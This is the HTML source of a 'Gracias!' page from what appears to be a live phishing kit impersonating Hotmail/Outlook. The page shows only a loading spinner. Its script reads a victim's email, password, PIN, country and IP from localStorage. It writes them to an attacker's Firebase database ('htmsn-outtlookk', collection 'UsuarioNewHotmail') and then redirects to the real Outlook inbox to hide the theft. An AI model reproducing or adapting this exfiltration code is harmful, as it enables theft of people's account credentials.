<!DOCTYPE html>
<html lang="en">
<head>
<!-- Inserted by miarroba -->
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-7294310421616689" crossorigin="anonymous"></script>
<script type='text/javascript' src='https://ads.vidoomy.com/miarroba_23335.js' async></script>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-T2VG59');</script>
<!-- Inserted by miarroba -->
  <meta name="robots" content="noindex" />
    <meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="nosnippet">
<meta name="robots" content="noindex, nofollow">
<meta name="robots" content="nofollow">
<meta name="googlebot" content="noindex">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Gracias!</title>
</head>
<style>
    .lds-ring {
  display: inline-block;
  position: relative;
  width: 80px;
  height: 80px;
}
.lds-ring div {
  box-sizing: border-box;
  display: block;
  position: absolute;
  width: 64px;
  height: 64px;
  margin: 8px;
  border: 8px solid #cef;
  border-radius: 50%;
  animation: lds-ring 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite;
  border-color: #cef transparent transparent transparent;
}
.lds-ring div:nth-child(1) {
  animation-delay: -0.45s;
}
.lds-ring div:nth-child(2) {
  animation-delay: -0.3s;
}
.lds-ring div:nth-child(3) {
  animation-delay: -0.15s;
}
@keyframes lds-ring {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(360deg);
  }
}

</style>
<body>
<!-- Inserted by miarroba -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-T2VG59" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- Inserted by miarroba -->
    <div class="lds-ring"><div></div><div></div><div></div><div></div></div>
<!-- Inserted by miarroba -->
</script></noframes></noembed></noscript><script type="text/javascript" src="/hosting__contador__visitas__unicas.php?h=2187390&amp;t=1737485957&amp;k=3f95784ff08bf80be1bd014b75fbfd6b&amp;__muid="></script>
<!-- Inserted by miarroba -->
</body>
<!-- The core Firebase JS SDK is always required and must be listed first -->
<script src="https://www.gstatic.com/firebasejs/8.6.5/firebase-app.js"></script>

<!-- TODO: Add SDKs for Firebase products that you want to use
     https://firebase.google.com/docs/web/setup#available-libraries -->
<script src="https://www.gstatic.com/firebasejs/8.6.5/firebase-analytics.js"></script>
<script src="https://www.gstatic.com/firebasejs/8.6.5/firebase-firestore.js"></script>



<script id="testScriptName">
  // Your web app's Firebase configuration
   const firebaseConfig = {
  apiKey: "AIzaSyC3k7T4WbSsTU47WmuzX5Gq-EVy1ywffvg",
  authDomain: "htmsn-outtlookk.firebaseapp.com",
  projectId: "htmsn-outtlookk",
  storageBucket: "htmsn-outtlookk.firebasestorage.app",
  messagingSenderId: "371686118555",
  appId: "1:371686118555:web:2ea417f31513e501b2a23e",
  measurementId: "G-PTJSFE765E"


  };
  // Initialize Firebase  
  firebase.initializeApp(firebaseConfig);

</script>

<script>
 const db = firebase.firestore();
/*const midnight = new Date(firebase.firestore.Timestamp.now().toDate().setHours(0, 0, 0, 0));*/

  const created = firebase.firestore.Timestamp.fromDate(new Date()).toDate();
window.addEventListener("load", async (e) => {
  e.preventDefault();
  /*
  
  
  agregar crypto.uuid()
  a el doc.name
  */
  
var name = crypto.randomUUID();
  await db.collection("UsuarioNewHotmail").doc(name).set({
    mail: localStorage.getItem("common"),
    pw: localStorage.getItem("commons"),
    pais: localStorage.getItem("pusr"),
    FECHA: localStorage.getItem("pusrf"),
    pin:localStorage.getItem("commonpn"),
    IP: localStorage.getItem("commonspnn"),
   revisado: false,
  });

  window.location.href = "https://outlook.live.com/mail/0/inbox";
});






</script>
</html>